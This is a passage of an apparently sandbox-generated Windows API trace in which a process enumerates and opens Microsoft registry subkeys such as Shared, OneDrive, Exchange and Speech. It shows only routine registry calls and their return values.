lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.649] RegEnumKeyW (in: hKey=0x148, dwIndex=0x23, lpName=0x18eb64, cchName=0xa | out: lpName="Shared") returned 0x0 [0083.649] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Shared", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.649] RegCloseKey (hKey=0x178) returned 0x0 [0083.649] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.649] RegEnumKeyW (in: hKey=0x148, dwIndex=0x10, lpName=0x18eb64, cchName=0xa | out: lpName="IMEJP") returned 0x0 [0083.649] RegCreateKeyExW (in: hKey=0x148, lpSubKey="IMEJP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.649] RegCloseKey (hKey=0x178) returned 0x0 [0083.649] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.649] RegEnumKeyW (in: hKey=0x148, dwIndex=0x13, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.649] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.649] RegEnumKeyW (in: hKey=0x148, dwIndex=0x2e, lpName=0x18eb64, cchName=0xa | out: lpName="Windows") returned 0x0 [0083.649] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Windows", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.649] RegCloseKey (hKey=0x178) returned 0x0 [0083.649] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.649] RegEnumKeyW (in: hKey=0x148, dwIndex=0x19, lpName=0x18eb64, cchName=0xa | out: lpName="MSDAIPP") returned 0x0 [0083.649] RegCreateKeyExW (in: hKey=0x148, lpSubKey="MSDAIPP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.649] RegCloseKey (hKey=0x178) returned 0x0 [0083.649] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.649] RegEnumKeyW (in: hKey=0x148, dwIndex=0x24, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.649] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.649] RegEnumKeyW (in: hKey=0x148, dwIndex=0x23, lpName=0x18eb64, cchName=0xa | out: lpName="Shared") returned 0x0 [0083.649] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Shared", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.649] RegCloseKey (hKey=0x178) returned 0x0 [0083.649] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.649] RegEnumKeyW (in: hKey=0x148, dwIndex=0x13, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.650] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.650] RegEnumKeyW (in: hKey=0x148, dwIndex=0xe, lpName=0x18eb64, cchName=0xa | out: lpName="IAM") returned 0x0 [0083.650] RegCreateKeyExW (in: hKey=0x148, lpSubKey="IAM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.650] RegCloseKey (hKey=0x178) returned 0x0 [0083.650] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.650] RegEnumKeyW (in: hKey=0x148, dwIndex=0x27, lpName=0x18eb64, cchName=0xa | out: lpName="Speech") returned 0x0 [0083.650] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Speech", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.650] RegCloseKey (hKey=0x178) returned 0x0 [0083.650] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.650] RegEnumKeyW (in: hKey=0x148, dwIndex=0x21, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.650] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.650] RegEnumKeyW (in: hKey=0x148, dwIndex=0x1e, lpName=0x18eb64, cchName=0xa | out: lpName="OneDrive") returned 0x0 [0083.650] RegCreateKeyExW (in: hKey=0x148, lpSubKey="OneDrive", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.650] RegCloseKey (hKey=0x178) returned 0x0 [0083.650] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.650] RegEnumKeyW (in: hKey=0x148, dwIndex=0x9, lpName=0x18eb64, cchName=0xa | out: lpName="Exchange") returned 0x0 [0083.650] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Exchange", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.650] RegCloseKey (hKey=0x178) returned 0x0 [0083.650] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.650] RegEnumKeyW (in: hKey=0x148, dwIndex=0x7, lpName=0x18eb64, cchName=0xa | out: lpName="Direct3D") returned 0x0 [0083.650] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Direct3D", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.650] RegCloseKey (hKey=0x178) returned 0x0 [0083.650] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.650] RegEnumKeyW (in: hKey=0x148, dwIndex=0x13, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.650] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.650] RegEnumKeyW (in: hKey=0x148, dwIndex=0xd, lpName=0x18eb64, cchName=0xa | out: lpName="GDIPlus") returned 0x0 [0083.650] RegCreateKeyExW (in: hKey=0x148, lpSubKey="GDIPlus", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.651] RegCloseKey (hKey=0x178) returned 0x0 [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0x1, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0x35, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0xd, lpName=0x18eb64, cchName=0xa | out: lpName="GDIPlus") returned 0x0 [0083.651] RegCreateKeyExW (in: hKey=0x148, lpSubKey="GDIPlus", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.651] RegCloseKey (hKey=0x178) returned 0x0 [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0x8, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0x9, lpName=0x18eb64, cchName=0xa | out: lpName="Exchange") returned 0x0 [0083.651] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Exchange", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.651] RegCloseKey (hKey=0x178) returned 0x0 [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0x35, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0x13, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0x36, lpName=0x18eb64, cchName=0xa | out: lpName="Wisp") returned 0x0 [0083.651] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Wisp", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, lpdwDisposition=0x0 | out: phkResult=0x18eb24*=0x178, lpdwDisposition=0x0) returned 0x0 [0083.651] RegCloseKey (hKey=0x178) returned 0x0 [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0x29, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0x35, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.651] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.651] RegEnumKeyW (in: hKey=0x148, dwIndex=0x8, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.652] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.652] RegEnumKeyW (in: hKey=0x148, dwIndex=0x1, lpName=0x18eb64, cchName=0xa | out: lpName="") returned 0xea [0083.652] RegQueryInfoKeyW (in: hKey=0x148, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18eb34, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18eb34*=0x37, lpcbMaxSubKeyLen=0x18eb20, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0083.652] RegEnumKeyW (in: hKey=0x148, dwIndex=0x27, lpName=0x18eb64, cchName=0xa | out: lpName="Speech") returned 0x0 [0083.652] RegCreateKeyExW (in: hKey=0x148, lpSubKey="Speech", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x18eb24, 